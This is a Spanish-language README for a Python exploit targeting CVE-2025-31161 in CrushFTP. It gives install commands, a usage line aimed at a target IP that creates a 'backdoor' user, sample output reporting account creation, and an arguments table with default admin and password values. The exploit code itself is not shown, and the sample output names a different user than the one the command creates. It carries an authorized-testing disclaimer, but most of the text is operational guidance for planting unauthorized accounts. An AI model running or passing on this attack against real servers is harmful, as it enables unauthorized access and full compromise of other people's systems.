
🛡️ CVE-2025-31161 - Exploit de Omisión de Autenticación en Creación de Usuarios de CrushFTP

Este exploit de Python ataca servidores CrushFTP vulnerables a CVE-2025-31161. La vulnerabilidad permite la creación de cuentas de usuario no autenticadas mediante el envío de un payload XML manipulado a la WebInterface, lo que potencialmente resulta en un compromiso completo del servidor.
Esta herramienta está destinada únicamente a pruebas de seguridad educativas y autorizadas.
El uso no autorizado contra sistemas que no poseas o para los que no tengas permiso explícito es ilegal y no ético.
requestscoloramaDebian/Ubuntu:
sudo apt update
sudo apt install python3 python3-pip -y
CentOS/RHEL:
sudo yum install python3 python3-pip -y
macOS (con Homebrew):
brew install python3
pip3 install requests colorama
python3 CVE-2025-31161.py --target_host <TARGET_IP> [--port <PORT>] [--target_user <ADMIN>] [--new_user <USERNAME>] [--password <PASSWORD>]
python3 CVE-2025-31161.py --target_host 192.168.1.100 --new_user backdoor --password P@ssw0rd!
[+] Preparing Payloads
[-] Warming up the target...
[-] Target is up and running
[+] Sending Account Create Request
[!] User created successfully!
[+] Exploit Complete! You can now login with:
[*] Username: AuthBypassAccount
[*] Password: CorrectHorseBatteryStaple
Gaurav Bhattacharjee (G4UR4V007)
Este proyecto está licenciado bajo la Licencia MIT.
| Argumento | Descripción | Valor predeterminado |
|---|
--target_host | (Requerido) IP o dominio del objetivo | — |
--port | Puerto de la WebInterface de CrushFTP | 8080 |
--target_user | Nombre de usuario administrador (usado en el payload) | crushadmin |
--new_user | Nombre de usuario para la nueva cuenta no autorizada | AuthBypassAccount |
--password | Contraseña para el nuevo usuario | CorrectHorseBatteryStaple |